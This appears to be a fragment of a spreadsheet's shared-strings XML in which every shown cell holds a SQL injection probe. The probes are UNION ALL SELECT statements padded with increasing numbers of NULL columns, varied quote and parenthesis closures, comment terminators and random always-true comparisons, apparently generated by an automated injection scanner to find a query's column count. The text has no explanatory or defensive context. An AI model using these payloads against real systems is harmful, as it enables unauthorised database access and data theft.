    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "HQYa" = "HQYa</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "kDij" LIKE "kDij</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "Bafo" LIKE "Bafo</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "bDDG" LIKE "bDDG</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "wsSU" LIKE "wsSU</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "eAIt" LIKE "eAIt</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "QamM" LIKE "QamM</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "bsGF" LIKE "bsGF</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "KtqX" LIKE "KtqX</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "FRbC" LIKE "FRbC</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "HUkQ" LIKE "HUkQ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "jaDN" LIKE "jaDN</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "bdnP" LIKE "bdnP</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "kRCD" LIKE "kRCD</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "PqYy" LIKE "PqYy</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "NcDJ" LIKE "NcDJ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "EUkx" LIKE "EUkx</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "mdnl" LIKE "mdnl</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "sptJ" LIKE "sptJ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "kRka" LIKE "kRka</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "CedR" LIKE "CedR</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "RlFV" LIKE "RlFV</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "OXfe" LIKE "OXfe</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "vqpp" LIKE "vqpp</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "FSXT" LIKE "FSXT</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "IGST" LIKE "IGST</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "QcZF" LIKE "QcZF</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "nNvS" LIKE "nNvS</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "RroR" LIKE "RroR</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "arze" LIKE "arze</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "tFYn" LIKE "tFYn</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "SaPx" LIKE "SaPx</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "KLHg" LIKE "KLHg</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "HOXk" LIKE "HOXk</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "VPrv" LIKE "VPrv</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "QDqW" LIKE "QDqW</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "uzgY" LIKE "uzgY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "rfzY" LIKE "rfzY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "MTIf" LIKE "MTIf</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "jqty" LIKE "jqty</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "KHeR" LIKE "KHeR</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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( 693 = 693</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 7410 = 7410</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 9628 = 9628</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 3278 = 3278</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 72 = 72</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 2185 = 2185</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 893 = 893</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 5796 = 5796</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 5411 = 5411</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 6152 = 6152</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  8100 = 8100</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  8030 = 8030</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  9007 = 9007</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  8469 = 8469</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  3929 = 3929</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  2416 = 2416</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  424 = 424</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  5478 = 5478</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  2064 = 2064</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  8487 = 8487</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 4448 = 4448</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 638 = 638</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 5462 = 5462</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 2629 = 2629</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 5204 = 5204</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 3081 = 3081</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 884 = 884</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 6907 = 6907</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 1 = 1</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 7490 = 7490</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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AND  ( 'GTPo' = 'GTPo</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'Quxe' = 'Quxe</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'QITd' = 'QITd</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'Mlys' = 'Mlys</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'Zkho' = 'Zkho</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'SbhG' = 'SbhG</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'HwJD' = 'HwJD</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'elzf' = 'elzf</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'Ogok' = 'Ogok</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'ZpLZ' = 'ZpLZ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'ZIwG' = 'ZIwG</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'rZqC' = 'rZqC</t>
  </si>
  <si>
